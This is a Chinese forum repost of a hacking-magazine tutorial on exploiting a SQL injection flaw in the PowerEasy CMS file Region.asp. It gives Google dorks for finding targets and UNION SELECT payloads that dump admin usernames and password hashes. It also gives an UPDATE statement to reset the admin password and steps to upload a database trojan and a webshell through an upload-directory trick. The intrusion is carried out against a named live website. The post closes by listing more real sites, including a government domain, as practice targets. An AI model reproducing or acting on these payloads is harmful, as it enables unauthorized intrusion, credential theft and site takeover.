【3AST交流】动易Region.asp注入漏洞利用
动易Region.asp注入漏洞利用本文章发布于06年1期的<<黑客X档案>>,转载请注名版权 by 天の翼
动易网站管理系统是当前中国最具性价比、最受欢迎的CMS系统和电子商务系统,目前已有超过10万个以上网站的应用规模,拥有政府、企业、科研教育和媒体等各个行业领域的几千名商业用户。
其中的Region.asp的Province = Trim(Request.QueryString("Province"))语句没经过过滤的,我们可以利用构造我们的SQL语句,进行注入。
总是用工具注入,水平也不会提高,而且目前还没有什么工具利用,所以我现在带领各位小黑们进行一次纯手工注入之旅,LET ‘S GO!
首先我们要找一些是动易的网站,动易的文章发布一是[url=http://127.0.0.1/Article/ShowArticle.asp?ArticleID=1]http://127.0.0.1/Article/ShowArticle.asp?ArticleID=1[/url] 这种形式的,现在就是GOOGLE HACKING时间。
打开GOOGLE,搜索“inurl:Article/ShowArticle.asp?ArticleID=”出现在我们大多都是使用动易的CMS系统的网站了,约有134万的查询结果,使用范围应该是很大的(巨汗ING…)
[img]http://www.meon.cn/1.jpg[/img]
往后翻几页,我随便打开了个网站。
[img]http://www.meon.cn/2.jpg[/img]
稍微看了下,是一个提供免费空间的站点,好,我们就从他下手了
我们先来暴用户名,在地址栏里提交
[url=http://www.onlinegf.com/region.asp?Country=Tony&City=tianyi&Province=shit]http://www.onlinegf.com/region.a ... i&Province=shit[/url] '+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1
解释一下:由于Province 过滤不严,Province =shit’后面的就是我们提交的注入语句,
+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1
这句的意思就是用UNION查询PE_Admin表(提示:动易的管理员一般是存放PE_Admin表中的,具体情况可以改其他的)在中的用户,即动易的CMS网站管理员的帐号。
[img]http://www.meon.cn/3.jpg[/img]
如果在“市/县/区/旗”的下拉框中显示的就是他的管理员的帐号,说明网站存在漏洞了
再来暴管理员的密码,在地址栏里输入:
[url=http://www.onlinegf.com/Region.asp?Country=Tony&City=tianyi&Province=shit]http://www.onlinegf.com/Region.a ... i&Province=shit[/url] '+and+1=2+union+select+password+from+PE_Admin+where+username="Jerry"+and+'1'='1
+and+1=2+union+select+password+from+PE_Admin+where+username="Jerry"+and+'1'='1的语句意思就是UNION查询PE_Admin表中Jerry的密码
我们把其中的Jerry改成刚才我们暴的管理员用户。
[img]http://www.meon.cn/4.jpg[/img]
密码暴了出来,是用MD5加密的16位的
去 [url=http://www.XMD5.com]www.XMD5.com[/url] 查了下,运气很好,密码是纯数字的,SQL版本如果查不出密码的话,可以直接UPDATE直接改掉管理员密码,
语句Update+PE_Admin+set+Password=' 49ba59abbe56e057' where+id=1—
改掉id为1的用户,一般是admin的密码为123456,
或者直接LOG差异备份,直接得到SHELL。我在光盘的放了两篇手工注入的精华文章,有兴趣的朋友可以自己研究。
[img]http://www.meon.cn/5.jpg[/img]
在主站最下面找到后台
[url=http://www.onlinegf.com/Admin/Admin_login.asp]http://www.onlinegf.com/Admin/Admin_login.asp[/url]
(改了的话可以GOOLE HACKING)
用得到的密码进入后台,成功了!
小黑们肯定抑制不住心中的喜悦了,别急,精彩还在后面,我们继续来拿SHELL
在后台管理 左边找到“系统设置”,选择下面的“网站频道管理”,点在右边的“下载中心”旁边的“修改”,找到“上传选项”,把“上传文件保存的目录”里改成asp.asp(名字随便,后缀要是ASP的)。保存修改结果。
[img]http://www.meon.cn/6.jpg[/img]
我们先来做个数据库木马,我用的是旁注小助手”diy.asp”
[img]http://www.meon.cn/7.jpg[/img]
保存的时候,文件名为”diy.rar”
再打开“下载中心”里的“添加软件”
[img]http://www.meon.cn/8.jpg[/img]
我们在上传软件上把diy.rar传上去,记下“软件地址”里的路径,我这是”200611/20061125222047379.rar”
我们在地址拦里输入 [url=http://www.onlinegf.com/soft/asp.asp/200611/20061125222047379.rar]http://www.onlinegf.com/soft/asp.asp/200611/20061125222047379.rar[/url]
哈哈,一匹小马出现拉!
[img]http://www.meon.cn/9.jpg[/img]
上传海洋大马得到了WEBSHELL,为了提醒下管理员,只留了个页子。
[img]http://www.meon.cn/10.jpg[/img]
为了不危害别人用免费空间,入侵就到此收工了,我可是好人啊。
(最后唠叨:其实包括很多黑客站,77169和3800hk都是用动易CMS系统的,被黑也是因为这个漏洞,相信,网络上又会血雨腥风了!
鸣谢 漏洞发现 by whytt)
PS:还是0DAY的时候就写了,现在才能放出来哦,嘿嘿
貌似还有些网站有漏洞哦
我随便找了下
[url=http://www.bsf365.com/region.asp?Country=Tony&City=tianyi&Province=shit]http://www.bsf365.com/[/url]
[url=http://www.cmtc.cn//region.asp?Country=Tony&City=tianyi&Province=shit]http://www.cmtc.cn//[/url]
[url=http://www.cedn.cn/]http://www.cedn.cn/[/url]
[url=http://www.zp.gov.cn/region.asp?Country=Tony&City=tianyi&Province=shit]http://www.zp.gov.cn/[/url]
给大家练手,不要搞破坏哦
页:
[1]